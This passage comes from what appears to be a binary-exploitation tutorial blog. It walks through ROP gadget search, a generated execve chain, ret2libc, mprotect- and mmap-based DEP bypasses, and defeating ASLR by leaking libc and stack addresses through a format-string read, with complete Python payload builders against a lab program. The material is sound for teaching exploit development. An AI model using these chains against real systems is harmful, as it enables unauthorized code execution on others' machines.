0x000000000008be8d: mov qword ptr [rbx + 0x40], r12; pop rbx; pop rbp; pop r12; ret; 
0x00000000000a3bce: mov qword ptr [rbx + 0x40], r8; and byte ptr [rbx + 0x50], 0xfe; mov qword ptr [rbx], rdi; mov dword ptr [rbx + 0x30], eax; call rcx;                                                                                                                                     
0x00000000001161f4: mov qword ptr [rbx + 0x40], rax; mov eax, 1; add rsp, 8; pop rbx; pop rbp; ret; 

As you can see, we’ve made the tool search for any memory move instruction pointed to by register rbx+40, regardless of the operand. This is very useful because, not in all cases, we’ll have gadgets that do exactly what we want. The alternative is to use different instructions indirectly to achieve the same result. The tool also provides an amazing feature to build fully ready-to-use ROP chains for us.

(libc.so.6/ELF/x86_64)> ropchain execve cmd=id

[INFO] ROPchain Generator for syscall execve:


[INFO] 
write command into data section
rax 0xb
rdi address to cmd
rsi address to null
rdx address to null


[INFO] Try to create chain which fills registers without delete content of previous filled registers
[*] Try permuation 1 / 24
[INFO] 

[INFO] Look for syscall gadget

[INFO] syscall gadget found
[INFO] generating rop chain
#!/usr/bin/env python
# Generated by ropper ropchain generator #
from struct import pack

p = lambda x : pack('Q', x)

IMAGE_BASE_0 = 0x0000000000000000 # 2f1f84e0f4df64e0eb1829fabd8720136456dc4efce9962cb1188f8d436e30b0
rebase_0 = lambda x : p(x + IMAGE_BASE_0)

rop = ''

rop += rebase_0(0x000000000003c714) # 0x000000000003c714: pop r13; ret; 
rop += '//////id'
rop += rebase_0(0x000000000002aa5f) # 0x000000000002aa5f: pop rbx; ret; 
rop += rebase_0(0x00000000001e7000)
rop += rebase_0(0x000000000005e961) # 0x000000000005e961: mov qword ptr [rbx], r13; pop rbx; pop rbp; pop r12; pop r13; ret; 
rop += p(0xdeadbeefdeadbeef)
rop += p(0xdeadbeefdeadbeef)
rop += p(0xdeadbeefdeadbeef)
rop += p(0xdeadbeefdeadbeef)
rop += rebase_0(0x000000000003c714) # 0x000000000003c714: pop r13; ret; 
rop += p(0x0000000000000000)
rop += rebase_0(0x000000000002aa5f) # 0x000000000002aa5f: pop rbx; ret; 
rop += rebase_0(0x00000000001e7008)
rop += rebase_0(0x000000000005e961) # 0x000000000005e961: mov qword ptr [rbx], r13; pop rbx; pop rbp; pop r12; pop r13; ret; 
rop += p(0xdeadbeefdeadbeef)
rop += p(0xdeadbeefdeadbeef)
rop += p(0xdeadbeefdeadbeef)
rop += p(0xdeadbeefdeadbeef)
rop += rebase_0(0x000000000002a205) # 0x000000000002a205: pop rdi; ret; 
rop += rebase_0(0x00000000001e7000)
rop += rebase_0(0x000000000002bb39) # 0x000000000002bb39: pop rsi; ret; 
rop += rebase_0(0x00000000001e7008)
rop += rebase_0(0x000000000010d37d) # 0x000000000010d37d: pop rdx; ret; 
rop += rebase_0(0x00000000001e7008)
rop += rebase_0(0x0000000000043067) # 0x0000000000043067: pop rax; ret; 
rop += p(0x000000000000003b)
rop += rebase_0(0x000000000008ed72) # 0x000000000008ed72: syscall; ret; 
print(rop)
[INFO] rop chain generated!

As you can see, the tool has created a full ROP chain for us to execute System Call (execve("id")). All we need to do is set the variable IMAGE_BASE_0 to the libc base address at runtime. Unfortunately, this is very limited, and the tool cannot create chains for everything we need, nor can it be completely reliable, as the cases vary from program to program and from one bug to another.

Return To Libc ( ret2libc )

Let’s practice on the first example presented in this blog and this time we will not compile it using the -zexecstack option.

Notice that the first time we compiled with the -zexecstack option, the exploitation succeeded, and the shellcode executed successfully, but the second time, when we did not use that option, the exploitation failed, and the shellcode did not execute.

We need to change our code execution strategy so that instead of making the program jump to execute the code injected into the stack, we make it return to libc and run the system function, which allows us to run commands on the system. The system function takes exactly one argument, the command in a null-terminated string. According to the Linux calling convention, the first parameter for any function call should passed over the rdi register, so we need a ROP gadget that sets our command address to rdi, and once this gadget returns, the saved instruction pointer should be another gadget that call the system function.

Great. Using the Peda searchmem command, we found the string “id” in the C library that we will use as a parameter to the system function.

gdb-peda$ x/s 0x7ffff7f5a078
0x7ffff7f5a078: "id"

Okay, now we need a ROP gadget that sets this pointer to the RDI register. A typical ROP gadget is pop rdi; ret, so we’ll replace the instruction pointer with the address of that gadget and put the command address next to it. Now, we’re ready to call the system function. We’ll follow the same approach: we’ll put the system function on the stack and use the pop rax; ret gadget to retrieve it, and then we’ll use the call rax gadget. But then the process will crash because once the system function finishes and returns, the next instruction pointer will be an address for something not under our control. So, we must call the exit function afterward to close the program properly. Fortunately, I found a gadget that calls a register (call rax) and then calls the exit function without us having to do it ourselves.

(gdb) x/3i 0x7ffff7dd7d66 
   0x7ffff7dd7d66 <__libc_start_call_main+118>: call   *%rax
   0x7ffff7dd7d68 <__libc_start_call_main+120>: mov    %eax,%edi
   0x7ffff7dd7d6a <__libc_start_call_main+122>: call   0x7ffff7df0280 <__GI_exit>
(gdb) 

We build our ROP chain as follows:

def hijack_exec(p: Popen, canary):
    payload = b""
    payload += b"A" * 0x112                               # Fills the stack frame
    payload += struct.pack( "<Q", canary )                # Places the correct canary value 
    payload += b"B" * 0x8                                 # Base pointer
    payload += struct.pack( "<Q", 0x7ffff7dd8205 )        # pop rdi; ret
    payload += struct.pack( "<Q", 0x7ffff7f5a078 )        # The command address ( id )
    payload += struct.pack( "<Q", 0x7ffff7df1067 )        # pop rax; ret
    payload += struct.pack( "<Q", 0x7ffff7e008f0 )        # system function address
    payload += struct.pack( "<Q", 0x7ffff7dd7d66 )        # call rax ; system( "id" ); exit( 0 )

    p.stdin.write( b"1\n" )
    p.stdin.write( payload + b"\n" )
    p.stdin.flush()

Let’s try this strategy against the program and see if it works.

Force Disable DEP Protection & Execute Arbitrary Code

Operating systems provide low-level APIs that allow us to modify the permissions of memory pages at runtime. Windows, for example, provides an API called VirtualProtect and an even lower-level native API called NtProtectVirtualMemory that does this. On the other hand, Unix-based systems provide similar APIs that accomplish the same task, such as mprotect. These facts can be abused to force the targeted program to execute our evil instructions.

We can abuse the mprotect function to make the stack executable and then force the program to execute instructions injected into the stack. The mprotect declaration is as follows:

int mprotect(void addr[.size], size_t size, int prot);

It takes exactly three paramters:

  1. addr: The starting address of the memory region, which must be aligned to the page boundary.
  2. size: The length in bytes of the address range.
  3. prot: The desired access protection. Such as PROT_READ, PROT_WRITE, and PROT_EXECUTE.

According to the Linux x64 calling convention, the three parameters must be passed through the RDI, RSI, and RDX registers. We need to build a ROP chain that performs the following:

  1. Set a stack address aligned with the page boundary to RDI, which can be done by writing that address into the stack and retrieving it via pop gadget (pop rdi; ret).
  2. Set the desired size to RSI by writing it into the stack and retrieving it via pop gadget (pop rsi; ret).
  3. Set the desired protection to RDX by writing it into the stack and retrieving it via pop gadget (pop rdx; ret).
  4. Put the direct address of mprotect on the stack as a return address so that the program can jump directly to executing it.
  5. Put the shellcode address next to the mprotect address so that it gets executed once the API returns.
def hijack_exec(p: Popen, canary):
    shellcode = 0x7fffffffddb0 + 0x40                     # Shellcode Address
    stack_page = shellcode & 0xfffffffffffff000           # Aligne the address to the page boundary.
    payload = b""
    payload += b"A" * 0x112                               # Fills the stack frame
    payload += struct.pack( "<Q", canary )                # Places the correct canary value 
    payload += b"B" * 0x8                                 # Base pointer
    payload += struct.pack( "<Q", 0x7ffff7dd8205 )        # pop rdi; ret
    payload += struct.pack( "<Q", stack_page )            # The aligned stack page address
    payload += struct.pack( "<Q", 0x7ffff7dd9b39 )        # pop rsi; ret
    payload += struct.pack( "<Q", 0x1000 )                # Page size 
    payload += struct.pack( "<Q", 0x7ffff7ebb37d )        # pop rdx; ret
    payload += struct.pack( "<Q", 0x01 | 0x02 | 0x04 )    # Protections: PROT_EXEC=0x01, PROT_WRITE=0x02, PROT_READ=0x04    
    payload += struct.pack( "<Q", 0x7ffff7ebb200 )        # mprotect function address
    payload += struct.pack( "<Q", shellcode )             # Jump into shellcode
    payload += b"\x90" * 0x40                             # NOPs for padding
    payload += buf                                        # Shellcode

    p.stdin.write( b"1\n" )
    p.stdin.write( payload + b"\n" )
    p.stdin.flush()

Let’s run this exploitation strategy and see what happens.

Alternatively, in Windows, it is possible to use functions like NTSetInformationProcess and SetProcessDEPPolicy to disable such protection and make the memory executable depending on the configured DEP mode. In Unix-based systems, there are some similar methods, where we can use a low-level API called personality and pass the READ_IMPLIES_EXEC flag as parameter to it, which will make the memory that will be mapped later executable even if it has not been mapped with execute permissions (this will not work on previously created heaps).

One effective method is to map new memory with execute permissions, then move the malicious instructions to that memory and redirect the execution flow of the program to execute those instructions. In Windows, there are several low-level APIs that help with this, such as VirtualAlloc, NtAllocateVirtualMemory, WriteProcessMemory, and NtWriteVirtualMemory. On the other hand, Unix-based systems have functions that do the same thing, such as mmap. Let’s follow this approach in developing our own exploit.

We need to build a ROP chain does exactly the following:

pExecutableMemory = mmap( NULL, 0x1000, PROT_EXEC|PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_SHARED, -1, 0 );
memcpy( pExecutableMemory, pShellcode, ulShellSize );
pExecutableMemory(); // jmp/call pExecutableMemory

The mmap declaration is exactly as follows:

void *mmap(void addr[.length], size_t length, int prot, int flags, int fd, off_t offset);

It takes the following parameters:

  1. addr: The starting address for the new mapping is specified in addr or NULL.
  2. length: The length of the mapping.
  3. prot: The desired access protection. Such as PROT_READ, PROT_WRITE, and PROT_EXECUTE.
  4. flags: This determines whether updates to the mapping are visible to other processes mapping the same region, and whether updates are carried through to the underlying file.
  5. fd: The file descriptor (this argument is ignored when MAP_ANONYMOUS flag was used).
  6. offset: The offset of the mapping memory in fd (this argument must be zero when using the MAP_ANONYMOUS flag).

Reminder: According to the x64 Linux Calling Convention, the six parameters must be passed to functions through registers in this order, rdi, rsi, rdx, rcx, r8, r9. So for calling that API we need to build a ROP chain that does the following:

  1. We have to set rdi to NULL. I couldn’t find neither mov rdi, 0; ret nor xor rdi, rdi; ret gadgets, so the alternative is pop rdi; ret, with zeros in the stack immediately after the gadget (We have no problem with \x00 as it is not a bad byte for the vulnerable program).
  2. The rsi register must be set to the appropriate size, for example 0x1000 (the memory page size). This gadget pop rsi; ret is convenient.
  3. The rdx register must be set to the disered protections (PROT_EXEC|PROT_READ|PROT_WRITE), we’ll use pop rdx; ret for that.
  4. The rcx register must be set to the disered flags (MAP_ANONYMOUS|MAP_SHARED), we’ll use pop rcx; add eax, 0x1734ba; ret for that. This gadget changes the eax value but we don’t care about the eax register right now so that’s ok.
  5. Register r8 needs to be set to -1, and -1 is exactly 0xffffffffffffff, so we’ll write this to the stack and retrieve it with the pop r8; ret gadget.
  6. The last parameter is zero so register r9 should be set to zero, but at this point it already holds zero so we don’t have to do anything with it.
  7. The mmap address must be set as a return address so that the system call will be executed after all its parameters have been set.

The next step is to copy our malicious code to the memory allocated by the mmap using the memcpy function. The memcpy function is declared as follows:

void *memcpy(void dest[restrict .n], const void src[restrict .n], size_t n);

It takes exactly three parameters:

  1. dest: The destination memory address to copies to.
  2. src: The source memory address that copies from.
  3. n: Number of bytes to be copied.

To do this we must complete our ROP chain as follows:

  1. The rdi register needs to be set to the mapping memory address returned by mmap in rax register. Unfortunately, I couldn’t find an appropriate gadget that moves the rax value to the rdi like mov rdi, rax; ret or push rax; pop rdi; ret, but thanks god, I managed to find a gadget that swaps them xchg rdi, rax; cld; ret;.
  2. The rsi register needs to be set to the shellcode address which is in the stack, so the gadget pop rsi; ret always comes to the rescue.
  3. The rdx needs to be set to the shellcode size, and as before we’ll use pop rdx; ret.
  4. The memcpy address must be set as a return address so that it get executed.

Now everything is in order and we just need to jump into that executable memory to make our shellcode run out. At this point, The rdi register holds the executable memory address (shellcode), so we need a gadget like jmp rdi or call rdi (the shellcode will kill the process, so we don’t care whether flow control is lost or not). But I found an alternative gadget which is push rdi; adc al, 0x48; lea eax, [rdi + 0x15]; ret;, this gadget pushes the executable shellcode address onto the stack, adding the carry flag + 0x48 to al, and then load the rdi value + 0x15 to eax (it’s valid and convenient). Once the gadget returns, the next return address will be the shellcode due to the push instruction.

def hijack_exec(p: Popen, canary):
    shellcode = 0x7fffffffddb0  + 0x40                    # Shellcode Address

    payload = b""
    payload += b"A" * 0x112                               # Fills the stack frame
    payload += struct.pack( "<Q", canary )                # Places the correct canary value 
    payload += b"B" * 0x8                                 # Base pointer
    payload += struct.pack( "<Q", 0x7ffff7dd8205 )        # pop rdi; ret
    payload += b"\x00" * 0x8                              # addr = NULL
    payload += struct.pack( "<Q", 0x7ffff7dd9b39 )        # pop rsi; ret
    payload += struct.pack( "<Q", 0x1000 )                # Page size 
    payload += struct.pack( "<Q", 0x7ffff7ebb37d )        # pop rdx; ret
    payload += struct.pack( "<Q", 0x01 | 0x02 | 0x04 )    # Protections: PROT_EXEC=0x01, PROT_WRITE=0x02, PROT_READ=0x04  
    payload += struct.pack( "<Q", 0x7ffff7ded94c )        # pop rcx; add eax, 0x1734ba; ret;
    payload += struct.pack( "<Q", 0x01 | 0x20 )           # flags: MAP_SHARED=0x01 MAP_ANONYMOUS=0x20
    payload += struct.pack( "<Q", 0x7ffff7fd9efb )        # pop r8; ret
    payload += b"\xff" * 0x8                              # fd = -1
    payload += struct.pack( "<Q", 0x7ffff7eba9a0 )        # mmap( NULL, 0x1000, PROT_EXEC|PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_SHARED, -1, 0 )
    
    payload += struct.pack( "<Q", 0x7ffff7f288a1 )        # xchg rdi, rax; cld; ret;
    payload += struct.pack( "<Q", 0x7ffff7dd9b39 )        # pop rsi; ret
    payload += struct.pack( "<Q", shellcode )             # Shellcode address
    payload += struct.pack( "<Q", 0x7ffff7ebb37d )        # pop rdx; ret
    payload += struct.pack( "<Q", len(buf) + 0x40 )       # Shellcode size for memcpy
    payload += struct.pack( "<Q", 0x7ffff7feb6e0 )        # memcpy( exec_mem, shellcode, shellsize )

    # Execute the shellcode
    payload += struct.pack( "<Q", 0x7ffff7e5ce42 )        # push rdi; adc al, 0x48; lea eax, [rdi + 0x15]; ret;
    
    payload += b"\x90" * 0x40                             # NOPs for padding
    payload += buf                                        # Shellcode

    p.stdin.write( b"1\n" )
    p.stdin.write( payload + b"\n" )
    p.stdin.flush()

Let’s fire:

Address Space Layout Randomization ( ASLR )

Most of the exploit strategies we’ve used always require fixed addresses to use, such as shellcode addresses in the stack, critical data addresses like canaries to leak, and ROP gadget addresses. Without knowing the addresses of this critical data, the exploit will fail completely. This protection is designed to kill this approach.

ASLR essentially randomizes the base address of the executable file when the program is loaded into memory and also randomizes the loaded libraries, stack, and heap. Thus, if an attacker gains control over the execution flow (such as controlling the instruction pointer), the location of the code to be executed, the addresses of the ROP gadgets, and everything else needed for the exploit are completely unknown. To understand how this protection exactly works, we first need to know how operating systems manage memory and the considerations behind it. Actually, what we see during debugging and the addresses we interact with are not actual physical memory addresses but virtual memory addresses. I’ll explain why operating systems work this way and what the benefits are.

In our current era, physical memory space is extremely limited compared to the needs of users who want to use numerous programs simultaneously and even servers that serve thousands or millions of clients. All of this is completely unsuitable for RAM sizes. Furthermore, RAM is very expensive, not only financially, but also because increasing it negatively impacts other aspects such as energy consumption and overall computer performance. Virtual memory thus came to solve these problems.

Virtual memory can be defined as a method of memory management by the operating system that simulates a memory larger than physical memory. It allows many programs whose size is larger than physical memory to run in a very intelligent way that allows loading part of the data into physical memory, but not the entire data. The hard disk is used to store data that is not in use. When the data’s turn comes, the memory manager swaps it to physical memory. To keep track of the data and its actual locations in physical memory, the memory manager builds a map table that identifies the virtual addresses of the data and the corresponding addresses of that data in physical memory, as well as additional information that identifies which virtual addresses belong to which process. Have you ever noticed that the same addresses are repeated in different processes running at the same time?

Operating Systems Concepts book ch9

This mapping table (Page Table) plays a vital role, helping the operating system translate virtual addresses into real physical addresses when a particular process requests access to these virtual addresses. The operating system works along with the memory management unit (MMU) in the CPU to perform this task. So, that’s the reason of why no collisions occur when different processes attempt to access the same virtual addresses.

Normally, when the ASLR is disabled, the operating system maps processes to a fixed virtual memory range. But, when it is enabled, the operating system selects random ranges each time the program is run. The Page Table will always help the memory manager translate these virtual addresses into physical addresses; it doesn’t care; they’re just numbers to it. I would like to point out here that data addresses in physical memory is essentially random whether you have ASLR enabled or not and in different locations each time the program is run. The whole problem lies with the virtual memory management system.

Defeating ASLR

Yes, this protection makes things more difficult and makes exploitation more complex, especially when used in conjunction with the other protections mentioned above. However, there is still a lot we can do to bypass this protection. One strategy is to leak the required addresses using any memory disclosure bug or other techniques so we can defeat the randomization and circumvent the protection. To build our ROP chain, we only need a single address belonging to the module/library. From this address, we can calculate the base address of the module and also all the required ROP gadgets.

As shown in the image, there are addresses in the stack relative to the Libc and also an address relative to the stack. We need to leak these addresses to dynamically calculate the addresses of the important ROP Gadgets we need, as well as the shellcode address. So, we need to update our leak_canary function to leak those required addresses, and rename it to an appropriate name such as leak_stuff.

def leak_stuff(p: Popen):
    p.stdin.write( b"1\n" + b"%49$p %51$p %67$p\n" + b"2\n" )
    p.stdin.flush()
    out = b""
    pos = -1
    n = 0
    
    while n < 1024:
        out = p.stdout.readline()
        pos = out.find( b"0x" )
        if bool( ~pos ):
            break

        n += 1

    else:
        return [ -1 ] * 3

    info = []
    n = 3

    while bool( n ):
        out = out[pos:]
        end = out.find( b" " )
        info += [ int(out[:end], 16) ]
        pos = ( end + 1 )
        n -= 1

    return info

After leaking them, we need to modify the hijack_exec function, giving it the C library base address and the shellcode address as arguments. But first, we need to calculate the information we need from these leaked addresses.

(gdb) p/x 0x7ffff7dd7d68-0x00007ffff7dae000
$1 = 0x29d68

The leaked address relative to the Libc, when subtracted from the library’s base address, gives us this result. Therefore, we must subtract the leaked address from this result to give us the library’s base address.

(gdb) p/x 0x7fffffffde98-(0x7fffffffddb0+0x40)
$2 = 0xa8

The leaked address relative to the Stack, when subtracted from the shellcode address, gives us this result. Therefore, we must subtract the leaked address from this result to give us the shellcode address.

def hijack_exec(p: Popen, canary, libc_base, shellcode):
    stack_page = shellcode & 0xfffffffffffff000           # Aligne the address to the page boundary.
    payload = b""
    payload += b"A" * 0x106                               # Fills the stack frame
    payload += struct.pack( "<Q", canary )                # Places the correct canary value 
    payload += b"B" * 0x8                                 # Base pointer
    payload += struct.pack( "<Q", libc_base + 0x2a205 )   # pop rdi; ret
    payload += struct.pack( "<Q", stack_page )            # The aligned stack page address
    payload += struct.pack( "<Q", libc_base + 0x2bb39 )   # pop rsi; ret
    payload += struct.pack( "<Q", 0x1000 )                # Page size 
    payload += struct.pack( "<Q", libc_base + 0x10d37d )  # pop rdx; ret
    payload += struct.pack( "<Q", 0x01 | 0x02 | 0x04 )    # Protections: PROT_EXEC=0x01, PROT_WRITE=0x02, PROT_READ=0x04    
    payload += struct.pack( "<Q", libc_base + 0x10d200 )  # mprotect function address
    payload += struct.pack( "<Q", shellcode )             # Jump into shellcode
    payload += b"\x90" * 0x40                             # NOPs for padding
    payload += buf                                        # Shellcode

    p.stdin.write( b"1\n" )
    p.stdin.write( payload + b"\n" )
    p.stdin.flush()

Now, this function can efficiently calculate all the required ROP gadgets addresses dynamically based on their relative virtual addresses (RVA) to the Libc base address. We now need to modify only two lines in the main function.

    canary, libc_relative_addr, stack_relative_addr = leak_stuff( p )

And

        hijack_exec( p, canary, libc_relative_addr-0x29d68, stack_relative_addr-0xa8 )

Now, everything is in order.

Notice that when we run the exploit while the ASLR is running (on different modes), it works despite the randomization of the addresses, as shown in the picture.

Other Bypassing Techniques

There are many methods and techniques for bypassing and circumventing ASLR. It all depends on the targeted system’s nature, functionality, and the environment in which it operates. The solutions are endless, but they require some diligence and careful thinking. Here are some methods that can be used:

  1. Non-aware ASLR Modules: Not all libraries are ASLR-protected, especially on Windows. In this case, the operating system is forced to load them into a fixed virtual memory address. This fact can be abused to build a stable ROP chain that helps us execute our code or do whatever we want.

  2. Low ASLR Entropy: Sometimes the ASLR is not implemented properly, randomizing addresses in a non-optimal way, where one or two bytes change, while the rest remain constant. In this case, if we are targeting a local binary that can be run multiple times or a network program that acts as a service and is automatically restarted when it crashes, the chances of it being exploited via brute force attacks increase. If you think I am joking or that this bullshit is not feasible, I would like to tell you that even in 2025, we are still seeing the use of such strategies as CVE-2025-0282.

Conclusion

The methods of circumventing various protections always depend primarily on the nature of the target, the environment in which it operates, its specific functionality, and many other factors of this kind. I would like to say that there is no magic method that anyone will tell you that will always allow you to bypass everything. Perhaps, yes, there are general ideas for each protection that help in bypassing it, but it depends on you. No one will help you except your experience and technical and practical skills. Perhaps a small detail in the program you are targeting, if used in an creative way, might allow you to bypass these protections. To improve your level and become able to develop your own creative exploitation strategies, you need to train and practice a lot. No one can develop complex and advanced exploits just by learning such vulnerabilities and attacks without practice and facing many scenarios. It comes gradually when you encounter many scenarios and read about different exploits. So, I advise you to read a lot and try to build exploits for previously discovered vulnerabilities yourself. This will help you a lot and improve your level insanely.